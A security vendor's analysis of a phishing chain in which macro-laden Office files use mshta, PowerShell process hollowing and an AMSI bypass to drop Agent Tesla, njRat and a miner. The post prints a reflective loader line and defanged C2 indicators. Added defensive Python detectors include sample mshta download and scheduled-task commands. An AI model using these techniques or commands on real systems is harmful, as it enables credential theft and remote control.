FortiGuard Labs Threat Research

Leveraging Microsoft Office Documents to Deliver Agent Tesla and njRat

By Cara Lin | October 03, 2022

We recently found some malicious Microsoft Office documents that attempted to leverage legitimate websites—MediaFire and Blogger—to execute a shell script and then dropped two malware variants of Agent Tesla and njRat. Agent Tesla is a well-known spyware, first discovered in 2014, which can steal personal data from web browsers, mail clients, and FTP servers, collect screenshots and videos, and capture clipboard data. njRat (also known as Bladabindi) is a remote agent Trojan first discovered in 2013 that is capable of remotely controlling a victim’s device to log keystrokes, access the camera, steal credentials stored in browsers, upload/download files, manipulate the registry, and more.

Affected platforms: Microsoft Windows
Impacted parties: Windows users
Impact: Control and collect sensitive information from a victim’s device
Severity level: Critical

In this article we will provide details of the documents we discovered, their embedded scripts used to deliver a payload, and the behavior of these malware variants.

1st Stage

In September 2022 we collected two kinds of files. One is a PowerPoint add-in and the other is a Word document that contains a lure picture and an embedded Excel form. Both files include similar VBA scripts that execute a macro right after the document is opened.

Based on the VBA script in the PPT add-in, shown in Figure 1, the code is automatically triggered because it uses the “Auto_Open()” function. Its “ControlTipText” and “Tag” fields contain the complete command “mshta” and the MediaFire URL. We can see the full URL in “vbaProject.bin”.

Figure 1: The VBA macro from the PPT add-In
Figure 2: Complete malicious URL in the vbaProject.bin file
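A defender-side triage heuristic for the pattern just described (auto-exec procedure whose command is assembled from form-control properties, with mshta and the URL stored in those properties). This is an added example, not code from the report or from the malicious document; the VBA text, the form strings and the URL are constructed placeholders, and the procedure names other than Auto_Open are included as the general case beyond the page's sample.

```python
import re

# Procedures Office runs as soon as macros are enabled; the report's sample
# uses Auto_Open. The others are the general case, beyond the page's sample.
AUTO_EXEC = {"auto_open", "autoopen", "document_open", "workbook_open", "auto_close"}
PROC = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)[^\n]*\n(.*?)^\s*End\s+Sub",
                  re.IGNORECASE | re.MULTILINE | re.DOTALL)
# Form-control properties used as a hiding place for the command text.
PROP_REF = re.compile(r"\.(ControlTipText|Tag)\b", re.IGNORECASE)
SHELL_CALL = re.compile(r"\b(Shell|CreateObject|\.Run|\.Exec)\b", re.IGNORECASE)
LOLBIN_OR_URL = re.compile(r"\b(mshta|powershell|wscript|cscript|rundll32)\b|https?://",
                           re.IGNORECASE)

def scan_vba(source: str, form_strings=()) -> dict:
    """Triage decompressed VBA source plus the string values pulled from the
    form controls (as an analyst would extract them from vbaProject.bin).
    Flags an auto-exec procedure that launches a command assembled from
    ControlTipText/Tag, and form strings that carry a LOLBin name or a URL."""
    hits = [name for name, body in PROC.findall(source)
            if name.lower() in AUTO_EXEC
            and PROP_REF.search(body) and SHELL_CALL.search(body)]
    payload = [s for s in form_strings if LOLBIN_OR_URL.search(s)]
    return {"auto_exec_shell_from_properties": hits,
            "payload_in_form_strings": payload,
            "suspicious": bool(hits) or bool(payload)}

# Constructed sample mirroring the pattern described for the PPT add-in; the
# URL is a placeholder, not the MediaFire address from the report.
SAMPLE_VBA = """\
Private Sub Auto_Open()
    Dim cmd As String
    cmd = UserForm1.Label1.ControlTipText & " " & UserForm1.Label1.Tag
    Shell cmd, vbHide
End Sub

Private Sub Helper()
    MsgBox "hello"
End Sub
"""
SAMPLE_FORM_STRINGS = ["mshta", "http://example.invalid/1.htm"]

if __name__ == "__main__":
    print(scan_vba(SAMPLE_VBA, SAMPLE_FORM_STRINGS))
```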

2nd Stage

We can see from Process Explorer shown in Figure 3 that the “mshta” process started right after clicking “Enable Macros” in the document. This leads to the MediaFire website, which is a legitimate file and picture sharing platform.

Figure 3: Process Explorer after clicking “Enable Macros”

Below is the content of “1.htm” from the first stage VBA macro:

Figure 4: “1.htm” downloaded from MediaFire

Figure 5 shows a clearer picture after converting some of the hex to ASCII strings.

Figure 5: Converted "1.htm"
This HTML file has three main jobs:
  1. Deliver a third-stage script file from the MediaFire site
  2. Kill the task WINWORD.EXE
  3. Add persistence by creating a scheduled task. Every 73 minutes it uses “mshta” to connect to the “http[:]//[.]uk/p/1[.]html” site, which contains a similar script. The blog screenshot seen below is from September 2022:
Figure 6: Web page of www[.]webclientservices[.]co[.]uk/p/1[.]html in the middle of September
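Detection logic for the three jobs of “1.htm” run over process-creation telemetry, as an added example that is not part of the original report. It assumes records shaped like Sysmon event 1 (pid, image, parent_image, command_line); the sample events and their URLs are constructed placeholders, not the MediaFire or Blogger addresses from the report.

```python
import re
from collections import namedtuple

# Office hosts seen in this chain (Word and the PowerPoint add-in) plus Excel,
# since the Word lure embeds an Excel form.
OFFICE_PARENTS = {"winword.exe", "powerpnt.exe", "excel.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
Finding = namedtuple("Finding", "rule pid detail")

def _image_name(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def detect_mshta_chain(events):
    """Scan process-creation records (dicts with pid, image, parent_image and
    command_line, the shape of Sysmon event 1) for the three jobs of 1.htm:
    Office spawning mshta with a remote URL, mshta killing WINWORD, and a
    scheduled task registered whose action is mshta plus a URL."""
    findings = []
    for ev in events:
        image = _image_name(ev["image"])
        parent = _image_name(ev.get("parent_image", ""))
        cmd = ev.get("command_line", "")
        low, url = cmd.lower(), URL_RE.search(cmd)
        if image == "mshta.exe" and url and parent in OFFICE_PARENTS:
            findings.append(Finding("office_spawns_mshta_url", ev["pid"],
                                    f"{parent} -> mshta {url.group(0)}"))
        elif image == "taskkill.exe" and "winword" in low and parent == "mshta.exe":
            findings.append(Finding("mshta_kills_winword", ev["pid"], cmd))
        elif image == "schtasks.exe" and "/create" in low and "mshta" in low and url:
            findings.append(Finding("schtasks_mshta_url", ev["pid"],
                                    f"scheduled mshta {url.group(0)}"))
    return findings

# Constructed telemetry, not from the report; the URLs are placeholders
# standing in for the MediaFire and Blogger addresses it describes.
_OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
_SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    {"pid": 4388, "image": _SYS32 + r"\mshta.exe", "parent_image": _OFFICE,
     "command_line": "mshta http://example.invalid/1.htm"},
    {"pid": 4395, "image": _SYS32 + r"\taskkill.exe", "parent_image": _SYS32 + r"\mshta.exe",
     "command_line": "taskkill /f /im WINWORD.EXE"},
    {"pid": 4402, "image": _SYS32 + r"\schtasks.exe", "parent_image": _SYS32 + r"\mshta.exe",
     "command_line": 'schtasks /create /sc minute /mo 73 /tn Updater '
                     '/tr "mshta http://example.invalid/p/1.html"'},
    # A local .hta launched by a service host carries no URL and is not flagged.
    {"pid": 4410, "image": _SYS32 + r"\mshta.exe", "parent_image": _SYS32 + r"\svchost.exe",
     "command_line": r"mshta C:\Users\u\local.hta"},
]
```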

We also discovered that the 1.html file in “www[.]webclientservices[.]co[.]uk” had been updated and renamed as “real all BACK SEP 2022”. The embedded JavaScript was also changed and now delivers other malware. More details are in the following section.

Figure 7: Updated page of www[.]webclientservices[.]co[.]uk/p/1[.]html found at the end of September

3rd Stage

The PowerShell script in “1.txt”, downloaded from MediaFire, delivers its final payload via the process hollowing technique. It first kills all related processes and decodes the loader and payload. It then invokes the final payload and deploys it, bypassing AMSI. The main payload and parts of the code are encoded, with strings substituted, to make analysis harder.

Figure 8: Full picture of the PowerShell used to load Agent Tesla
Figure 9: Process Explorer after PowerShell is executed

In the second part of the “Load Agent Tesla Payload” process, the variables $CLE11 and $RNBX1 are the final payload and the loader after some strings have been replaced. Based on the installed .NET version, it selects one of several target paths for the process hollowing activity:

$Path = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe'

$Path2 = 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe'

$Path3 = 'C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe'

      [Reflection.Assembly]::Load((HexaToByte($RNBX1))).GetType('CALC.PAYSIAS').GetMethod('Execute').Invoke($null,[object[]] ($Path, HexaToByte($CLE11)));

We saved $RNBX1 as an executable file and opened it with dnSpy. The target class and method can be seen in Figure 10. This .NET loader uses obfuscation to hide the main APIs it calls (CreateProcess, VirtualAllocEx, etc.).

Figure 10: .NET loader

We located the targeted processes, “jsc.exe”, “caspol.exe” and “Msbuild.exe”, running quietly on the victim’s machine. The details are shown in Figure 11.

Figure 11: Process Explorer while process hollowing

At the end of the PowerShell section, the script disables logging and bypasses AMSI by patching it. The detailed steps can be seen in Figure 12.

Figure 12: Bypassing AMSI in PowerShell

Final Stage – Part 1

The first malware payload is Agent Tesla. This variant began spreading in the middle of September. Its file information is copied from a legitimate program, "Web Browser Password Viewer" from the company “NirSoft”, and it uses FTP to send out stolen data.

Figure 13: Basic information of Agent Tesla

Figure 14 is a screenshot of the attacker’s FTP server information, including username and password, used for transferring extracted data. This variant also copies itself into the %appdata% directory with the filename “NGCwje.exe” for persistence.

Figure 14: The attacker’s server information

It then starts to extract the victim device’s information, such as the baseboard serial number, processor ID, and MAC address, and generates an MD5 hash of this data.

Figure 15: Generating an MD5 hash of the victim machine’s information

Agent Tesla uses a typical application list to steal login credentials, cookies, mail information, and VPN data. A partial set of these items can be seen in the following figure:

Figure 16: List for targeted browser applications

Once the malware retrieves the credentials and other information from the victim’s machine, it sends this data over FTP to a hardcoded IP address.

Figure 17: Utilizing the FTP protocol
Figure 18: Traffic capture from the victim's machine

Based on the type of data it collects, it uses one of four filename prefixes: “CO” for cookie data, “KL” for keyboard logging, “PW” for the victim’s password information, and “SC” for screenshot files. The malware joins the data type, username, device name, and timestamp with underscores to form the filename of the ZIP file holding the data. The list of stolen ZIP files is shown below:

Figure 19: Partial list of the Zip files on the FTP server

Final Stage – Part 2

The second payload is njRat, also known as Bladabindi. It is a .NET Trojan for controlling and spying on a victim’s device. This variant uses obfuscation for its string generation and code flow. From an IDA graph overview of method ko(), you can see that this variant is more complex, but you can still identify the similar functions.

Figure 20: IDA graph overview
Figure 21: The entry point of njRat
Figure 22: String decoding function

First, it creates .lnk and .exe files in the “Startup” and “Templates” folders with the filename “Windows”. This name is used to trick users and analysts into thinking it is a legitimate Windows file.

Figure 23: Creating persistence

It then gets its command and control server hostname and port number in reverse order.

Figure 24: Command and control server information

To make sure this malware only runs once on this victim, it adds a registry value named “di” with the data “!” under “HKEY_CURRENT_USER”.

Figure 25: Adding to the registry in “HKEY_CURRENT_USER”
Figure 26: Registry status

It also creates a mutex with the string “Windows”, sets the environment variable “SEE_MASK_NOZONECHECKS” to 1, and checks whether this mutex already existed. If so, it ends the process.

Figure 27: Creating a mutex
Figure 28: Setting the environment variable

After it collects the machine’s information, it uses base64 to encode it and concatenates the data, as seen in Figure 29. It then transfers the data to server “mobnew6565[.]duckdns[.]org” using hardcoded TCP port 7575.

Figure 29: Concatenated data

Following is the C2 traffic from the Win10 victim machine. The separator has changed to “|-F-|” and the version is “v4.0”, but the packet format is similar to that of older njRat versions:

<message length>.<command>|-F-|<data>

Figure 30: Traffic captured from the victim
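A parser for the packet format above, written as an added example for analysts working from a capture; it is not code from the report or from njRat. It assumes the length field is plain ASCII digits and counts the bytes after the dot, and the sample stream (including its command names) is constructed rather than taken from the capture in Figure 30. The parser also handles the one case a live capture always produces: a frame cut off at the end of the buffer.

```python
SEP = b"|-F-|"   # v4.0 field separator from the capture in the report

def parse_njrat_stream(buf: bytes):
    """Split a captured njRat C2 byte stream into (command, data) messages.

    Framing, as described in the report: <message length>.<command>|-F-|<data>,
    where the length is the decimal byte count of everything after the dot.
    Returns (messages, remainder); remainder is an incomplete trailing frame,
    so a capture cut mid-message is neither truncated nor mis-aligned.
    Assumption (not stated on the page): the length is plain ASCII digits."""
    messages, pos = [], 0
    while pos < len(buf):
        dot = buf.find(b".", pos)
        if dot == -1:
            break                               # length prefix not complete
        length_field = buf[pos:dot]
        if not length_field.isdigit():
            raise ValueError(f"bad length field at offset {pos}: {length_field!r}")
        end = dot + 1 + int(length_field)
        if end > len(buf):
            break                               # frame body not complete
        cmd, sep, data = buf[dot + 1:end].partition(SEP)
        messages.append((cmd.decode("ascii", "replace"), data if sep else b""))
        pos = end
    return messages, buf[pos:]

def _frame(cmd: bytes, data: bytes) -> bytes:
    """Build one frame in the same format (used only to construct the sample)."""
    body = cmd + SEP + data
    return str(len(body)).encode() + b"." + body

# Constructed sample (not a real capture): two complete frames with placeholder
# command names, followed by a frame cut off mid-body.
SAMPLE_STREAM = (_frame(b"ll", b"base64-host-info-placeholder")
                 + _frame(b"inf", b"v4.0")
                 + b"40.ret|-F-|partial")
```

Feed successive TCP segments by prepending the returned remainder to the next chunk before calling the parser again.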

Besides Agent Tesla and njRat, we also found a short script in the updated HTML file “[.]uk/p/1[.]html” that downloads a miner to “C:\\ProgramData”. This is odd behavior, since every other step in this attack chain tries to leave no physical trace or file on the victim’s machine. We think the miner might be a distraction so that victims do not notice that another process is loading njRat.

Figure 31: JavaScript that downloads a miner
Figure 32: Process Explorer view for njRat and miner


Agent Tesla and njRat have both been highly active malware families for years. Their functions are mature and easy to use for spying on victims or stealing information. As we mentioned previously, the malicious URL keeps updating its embedded JavaScript, which means these phishing emails and lure Office documents remain an efficient way to spread this malware. The VBA macro, the PowerShell, and the JavaScript embedded in the website all support fileless attacks and evade some antivirus detection by obfuscating or encoding their strings.

Users should always be wary of any office document or unknown file containing links to external websites.

Figure 33: Attack flow

Fortinet Protections

The VBA macro and all related malware are detected and blocked by FortiGuard Antivirus:


Both the downloaded URL and attacker’s host have been rated as "Malicious Websites" by the FortiGuard Web Filtering service.

Microsoft Office files can be disarmed by the FortiGuard Content Disarm & Reconstruction (CDR) service.

Since the majority of malware is delivered via phishing, organizations should also consider leveraging Fortinet solutions designed to train users to understand and detect phishing threats:

Our free NSE training, NSE 1 – Information Security Awareness, includes a module on internet threats designed to help end users learn how to identify and protect themselves from various types of phishing attacks, and it can be easily added to internal training programs.

The FortiPhish Phishing Simulation Service uses real-world simulations to help organizations test user awareness and vigilance to phishing threats and to train and reinforce proper practices when users encounter targeted phishing attacks.

Learn more about Fortinet’s FortiGuard Labs threat research and global intelligence organization and Fortinet’s FortiGuard AI-powered Security Services portfolio. Sign up to receive our threat research blogs.